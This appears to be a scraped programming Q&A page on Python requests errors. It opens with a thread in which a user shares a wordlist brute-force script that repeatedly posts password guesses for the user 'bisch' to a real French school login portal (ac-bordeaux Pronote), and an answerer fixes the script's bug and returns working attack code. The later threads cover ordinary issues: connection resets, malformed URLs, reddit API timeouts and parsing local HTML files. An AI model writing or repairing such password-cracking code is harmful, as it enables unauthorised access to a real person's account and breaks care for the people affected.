Failed to parse: <Response [200]> - python

Please help me i don't know how to use requests
This is the code :
import requests
url = requests.get("https://idp-fim-aaa.ac-bordeaux.fr/login/ct_logon_mixte.jsp?CT_ORIG_URL=%2Fsso%2FSSO%3FSPEntityID%3Dhttps%3A%2F%2Fent2d.ac-bordeaux.fr%2Fshibboleth%26TARGET%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html%26RelayState%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html")
arq = open('word.txt','r').readlines()
for line in arq:
password = line.strip()
http = requests.post(url, data={'user':'bisch', 'password':password, 'button':'submit'})
content = http.content
if "Identifiant ou mot de passe incorrect" in content:
print("[-]Invalide : "+password)
else:
print("================== [+] MOT DE PASSE CRACKÉ : "+password+"===========")
break
and i got this :
Traceback (most recent call last): File "F:\Program Files
(x86)\py\lib\site-packages\requests\models.py", line 382, in
prepare_url
scheme, auth, host, port, path, query, fragment = parse_url(url) File "F:\Program Files
(x86)\py\lib\site-packages\urllib3\util\url.py", line 394, in
parse_url
return six.raise_from(LocationParseError(source_url), None) File "", line 3, in raise_from
urllib3.exceptions.LocationParseError: Failed to parse: <Response
[200]>
During handling of the above exception, another exception occurred:
Traceback (most recent call last): File "F:/Program Files
(x86)/py/Hack pronote/Pronote v3/Pronote.py", line 8, in
http = requests.post(url, data={'user':'bisch', 'password':password, 'button':'submit'}) File "F:\Program Files
(x86)\py\lib\site-packages\requests\api.py", line 119, in post
return request('post', url, data=data, json=json, **kwargs) File "F:\Program Files (x86)\py\lib\site-packages\requests\api.py", line
61, in request
return session.request(method=method, url=url, **kwargs) File "F:\Program Files (x86)\py\lib\site-packages\requests\sessions.py",
line 528, in request
prep = self.prepare_request(req) File "F:\Program Files (x86)\py\lib\site-packages\requests\sessions.py", line 456, in
prepare_request
p.prepare( File "F:\Program Files (x86)\py\lib\site-packages\requests\models.py", line 316, in prepare
self.prepare_url(url, params) File "F:\Program Files (x86)\py\lib\site-packages\requests\models.py", line 384, in
prepare_url
raise InvalidURL(*e.args) requests.exceptions.InvalidURL: Failed to parse: <Response [200]>

As said by #Iarsks, this is a problem where you're trying to use the URL variable, but the URL variable is not a string but an object, request object to be specific.
If I understood your code, I and as #Iarsks said, you probably don't understand how requests work cuz, it seems like your trying to declare an URL somehow when it's not needed. To simplify, you only need the URL string like this:
url = "https://idp-fim-aaa.ac-bordeaux.fr/login/ct_logon_mixte.jsp?CT_ORIG_URL=%2Fsso%2FSSO%3FSPEntityID%3Dhttps%3A%2F%2Fent2d.ac-bordeaux.fr%2Fshibboleth%26TARGET%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html%26RelayState%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html"
with out the requests.get() function.
So you can understand this library better there are two mainly used requests methods GET and POST, there are more, but for the sake of this ill only talk about these two, where GET is when you want to get information from the website, for example, a JSON file from and API, and POST when your want to save or send some new data to and API or webpage.
Anyways I would recommend your reading about the basics of requests and how the backend handles them to understand and see how it all works before starting to use requests on your own.
If I got your problem right, the following code should fix your problem:
import requests
url = "https://idp-fim-aaa.ac-bordeaux.fr/login/ct_logon_mixte.jsp?CT_ORIG_URL=%2Fsso%2FSSO%3FSPEntityID%3Dhttps%3A%2F%2Fent2d.ac-bordeaux.fr%2Fshibboleth%26TARGET%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html%26RelayState%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html"
arq = open('word.txt','r').readlines()
for line in arq:
password = line.strip()
http = requests.post(url, data={'user':'bisch', 'password':password, 'button':'submit'})
content = http.content
if "Identifiant ou mot de passe incorrect" in content:
print("[-]Invalide : "+password)
else:
print("================== [+] MOT DE PASSE CRACKÉ : "+password+"===========")
break

Related

Python Requests OS Error 104 Connection Broken Error

Hi I am trying to a hit an API using requests module of python. The Api has to be hit 20000 times as the number of pages are around 20000. In every hit the data comes around 10 mb. By the end of the process it creates a json file of around 100gb. Here is the code I have written
with open('file.json','wb',buffering=100*1048567) as f:
while(next_page_cursor != ""):
with request.get(url,headers=headers) as response:
json_response = json.loads(response.content.decode('utf-8'))
"""
json response looks something like this
{
content:[{},{},{}........50 dictionaries]
next_page_cursor : "abcd"
}
"""
next_page_cursor = json_response['next_page_cursor']
for data in json_response['content']:
f.write((json.dumps(data) + "\n").encode())
But after running successfully for few pages the code fails giving the below error:
Traceback (most recent call last):
File "<command-1206920060120926>", line 65, in <module>
with requests.get(data_url, headers = headers) as response:
File "/databricks/python/lib/python3.7/site-packages/requests/api.py", line 75, in get
return request('get', url, params=params, **kwargs)
File "/databricks/python/lib/python3.7/site-packages/requests/api.py", line 60, in request
return session.request(method=method, url=url, **kwargs)
File "/databricks/python/lib/python3.7/site-packages/requests/sessions.py", line 533, in request
resp = self.send(prep, **send_kwargs)
File "/databricks/python/lib/python3.7/site-packages/requests/sessions.py", line 686, in send
r.content
File "/databricks/python/lib/python3.7/site-packages/requests/models.py", line 828, in content
self._content = b''.join(self.iter_content(CONTENT_CHUNK_SIZE)) or b''
File "/databricks/python/lib/python3.7/site-packages/requests/models.py", line 753, in generate
raise ChunkedEncodingError(e)
requests.exceptions.ChunkedEncodingError: ('Connection broken: OSError("(104, \'ECONNRESET\')")', OSError("(104, 'ECONNRESET')"))
you need to use response.iter_content
https://2.python-requests.org/en/master/api/#requests.Response.iter_content

Download with Python from URL gives No Host Supplied error

I am trying to make app that download comics but whenever I try to download an image, it says no host supplied.
I really searched and there was nothing.
This is the code:
import requests,bs4
url='https://www.marvel.com/comics/issue/71314/edge_of_spider-geddon_2018_1'
res=requests.get(url,stream=True)
res.raise_for_status()
soup=bs4.BeautifulSoup(res.text)
elem=soup.select('div[class="row-item-image"] img')#.viewer-cnt .row .col-xs-12 #ppp img')
#print(elem)
comicurl='https:'+elem[0].get('src')
res=requests.get(comicurl,stream=True,allow_redirects=True)
res.raise_for_status()
with open(comicurl[comicurl.rfind('/')+1:],'wb') as i:
for chunk in res.iter_content(100000):
i.write(chunk)
I expect it to download the image but it gives me this error:
Traceback (most recent call last):
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\comicdownloader.py", line 10, in <module>
res=requests.get(comicurl,stream=True,allow_redirects=True)
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\api.py", line 75, in get
return request('get', url, params=params, **kwargs)
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\api.py", line 60, in request
return session.request(method=method, url=url, **kwargs)
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\sessions.py", line 519, in request
prep = self.prepare_request(req)
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\sessions.py", line 462, in prepare_request
hooks=merge_hooks(request.hooks, self.hooks),
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\models.py", line 313, in prepare
self.prepare_url(url, params)
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\models.py", line 390, in prepare_url
raise InvalidURL("Invalid URL %r: No host supplied" % url)
requests.exceptions.InvalidURL: Invalid URL 'https:https://i.annihil.us/u/prod/marvel/i/mg/6/b0/5b6c5e4154f75/portrait_uncanny.jpg': No host supplied
And it gives it to me whenever I try it on any website.
it looks like elem[0].get('src') evaluates to https://i.annihil.us/u/prod/marvel/i/mg/6/b0/5b6c5e4154f75/portrait_uncanny.jpg.
so on line comicurl='https:'+elem[0].get('src') you add http: in front of an already well formed url, making it invalid
Can't argue with this: Invalid URL 'https:https://i.annihil.us/u/prod -- the URL is really invalid, probably you should get rid of https in the following statement:
comicurl='https:'+elem[0].get('src')

reddit API praw error HTTP request or JSON object

I use reddit API praw and psraw to extract comments from a subreddit, however, I got two errors today after running a few loops:
JSON object decoded error or empty -> ValueError, even I catch exception in my code, still doesnt work.
http request
example:
Traceback (most recent call last):
File "C:/Users/.../subreddit psraw.py", line 20, in <module>
for comment in submission.comments:
File "C:\Python27\lib\site-packages\praw\models\reddit\base.py", line 31, in __getattr__
self._fetch()
File "C:\Python27\lib\site-packages\praw\models\reddit\submission.py", line 142, in _fetch
'sort': self.comment_sort})
File "C:\Python27\lib\site-packages\praw\reddit.py", line 367, in get
data = self.request('GET', path, params=params)
File "C:\Python27\lib\site-packages\praw\reddit.py", line 451, in request
params=params)
File "C:\Python27\lib\site-packages\prawcore\sessions.py", line 174, in request
params=params, url=url)
File "C:\Python27\lib\site-packages\prawcore\sessions.py", line 108, in _request_with_retries
data, files, json, method, params, retries, url)
File "C:\Python27\lib\site-packages\prawcore\sessions.py", line 93, in _make_request
params=params)
File "C:\Python27\lib\site-packages\prawcore\rate_limit.py", line 33, in call
response = request_function(*args, **kwargs)
File "C:\Python27\lib\site-packages\prawcore\requestor.py", line 49, in request
raise RequestException(exc, args, kwargs)
prawcore.exceptions.RequestException: error with request
HTTPSConnectionPool(host='oauth.reddit.com', port=443): Read timed out. (read timeout=16.0)
Since a subreddit contains 10k+ comments, is there a way to solve such issue? is it because reddit website has some problems today?
My code:
import praw, datetime, os, psraw
reddit = praw.Reddit('bot1')
subreddit = reddit.subreddit('example')
for submission in psraw.submission_search(reddit, subreddit='example', limit=1000000):
try:
#get comments
for comment in submission.comments:
subid = submission.id
comid = comment.id
com_body = comment.body.encode('utf-8').replace("\n", " ")
com_date = datetime.datetime.utcfromtimestamp(comment.created_utc)
string_com = '"{0}", "{1}", "{2}"\n'
formatted_string_com = string_com.format(comid, com_body, com_date)
indexFile_comment = open('path' + subid + '.txt', 'a+')
indexFile_comment.write(formatted_string_com)
except ValueError:
print ("error")
pass
continue
except AttributeError:
print ("error")
pass
continue

for range to send post request by using requests.Session(), it alert 'module' object has no attribute 'kqueue'

macOS 10.12.3 python 2.7.13 requests 2.13.0
I use requests package to send post request.This request need to login before post data.So I use request.Session() and load a logined cookie.
Then I use this session to send post data in cycle mode.
It is no error that I used to run this code in Windows and Linux.
Simple Code:
s = request.Session()
s.cookies = cookieslib.LWPCookieJar('cookise')
s.cookies.load(ignore_discard=True)
for user_id in range(100,200):
url = 'http://xxxx'
data = { 'user': user_id, 'content': '123'}
r = s.post(url, data)
...
But the program frequently (about every interval) crash, the error isAttributeError: 'module' object has no attribute 'kqueue'
Traceback (most recent call last):
File "/Users/gasxia/Dev/Projects/TgbookSpider/kfz_send_msg.py", line 90, in send_msg
r = requests.post(url, data) # catch error if user isn't exist
File "/usr/local/lib/python2.7/site-packages/requests/sessions.py", line 535, in post
return self.request('POST', url, data=data, json=json, **kwargs)
File "/usr/local/lib/python2.7/site-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/site-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/site-packages/requests/adapters.py", line 423, in send
timeout=timeout
File "/usr/local/lib/python2.7/site-packages/requests/packages/urllib3/connectionpool.py", line 588, in urlopen
conn = self._get_conn(timeout=pool_timeout)
File "/usr/local/lib/python2.7/site-packages/requests/packages/urllib3/connectionpool.py", line 241, in _get_conn
if conn and is_connection_dropped(conn):
File "/usr/local/lib/python2.7/site-packages/requests/packages/urllib3/util/connection.py", line 27, in is_connection_dropped
return bool(wait_for_read(sock, timeout=0.0))
File "/usr/local/lib/python2.7/site-packages/requests/packages/urllib3/util/wait.py", line 33, in wait_for_read
return _wait_for_io_events(socks, EVENT_READ, timeout)
File "/usr/local/lib/python2.7/site-packages/requests/packages/urllib3/util/wait.py", line 22, in _wait_for_io_events
with DefaultSelector() as selector:
File "/usr/local/lib/python2.7/site-packages/requests/packages/urllib3/util/selectors.py", line 431, in __init__
self._kqueue = select.kqueue()
AttributeError: 'module' object has no attribute 'kqueue'
This looks like a problem that commonly arises if you're using something like eventlet or gevent, both of which monkeypatch the select module. If you're using those to achieve asynchrony, you will need to ensure that those monkeypatches are applied before importing requests. This is a known bug, being tracked in this issue.

How do I use Python and lxml to parse a local html file?

I am working with a local html file in python, and I am trying to use lxml to parse the file. For some reason I can't get the file to load properly, and I'm not sure if this has to do with not having an http server set up on my local machine, etree usage, or something else.
My reference for this code was this: http://docs.python-guide.org/en/latest/scenarios/scrape/
This could be a related problem: Requests : No connection adapters were found for, error in Python3
Here is my code:
from lxml import html
import requests
page = requests.get('C:\Users\...\sites\site_1.html')
tree = html.fromstring(page.text)
test = tree.xpath('//html/body/form/div[3]/div[3]/div[2]/div[2]/div/div[2]/div[2]/p[1]/strong/text()')
print test
The traceback that I'm getting reads:
C:\Python27\python.exe "C:/Users/.../extract_html/extract.py"
Traceback (most recent call last):
File "C:/Users/.../extract_html/extract.py", line 4, in <module>
page = requests.get('C:\Users\...\sites\site_1.html')
File "C:\Python27\lib\site-packages\requests\api.py", line 69, in get
return request('get', url, params=params, **kwargs)
File "C:\Python27\lib\site-packages\requests\api.py", line 50, in request
response = session.request(method=method, url=url, **kwargs)
File "C:\Python27\lib\site-packages\requests\sessions.py", line 465, in request
resp = self.send(prep, **send_kwargs)
File "C:\Python27\lib\site-packages\requests\sessions.py", line 567, in send
adapter = self.get_adapter(url=request.url)
File "C:\Python27\lib\site-packages\requests\sessions.py", line 641, in get_adapter
raise InvalidSchema("No connection adapters were found for '%s'" % url)
requests.exceptions.InvalidSchema: No connection adapters were found for 'C:\Users\...\sites\site_1.html'
Process finished with exit code 1
You can see that it has something to do with a "connection adapter" but I'm not sure what that means.
If the file is local, you shouldn't be using requests -- just open the file and read it in. requests expects to be talking to a web server.
with open(r'C:\Users\...site_1.html', "r") as f:
page = f.read()
tree = html.fromstring(page)
There is a better way for doing it:
using parse function instead of fromstring
tree = html.parse("C:\Users\...site_1.html")
print(html.tostring(tree))
You can also try using Beautiful Soup
from bs4 import BeautifulSoup
f = open("filepath", encoding="utf8")
soup = BeautifulSoup(f)
f.close()

Categories

Resources